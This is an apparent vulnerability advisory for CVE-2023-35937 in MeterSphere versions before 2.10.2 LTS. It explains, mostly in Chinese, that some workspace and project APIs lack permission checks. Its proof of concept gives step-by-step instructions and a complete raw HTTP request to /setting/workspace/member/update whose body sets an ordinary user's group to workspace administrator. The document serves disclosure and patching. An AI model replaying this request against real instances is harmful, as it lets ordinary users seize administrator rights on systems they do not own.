Headline

CVE-2023-35937: metersphere 存在权限检查缺失漏洞

Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

1 year ago

CVE

Open in Source

#csrf #web #windows #apple #js #auth #chrome #webkit

Summary

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

PoC

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

以workspace中的/setting/workspace/member/update 为例

POST /setting/workspace/member/update HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 144
Accept-Language: zh-CN
WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
Connection: close

{"id":"user2","name":"user2","email":"[email protected]","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

Impact

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。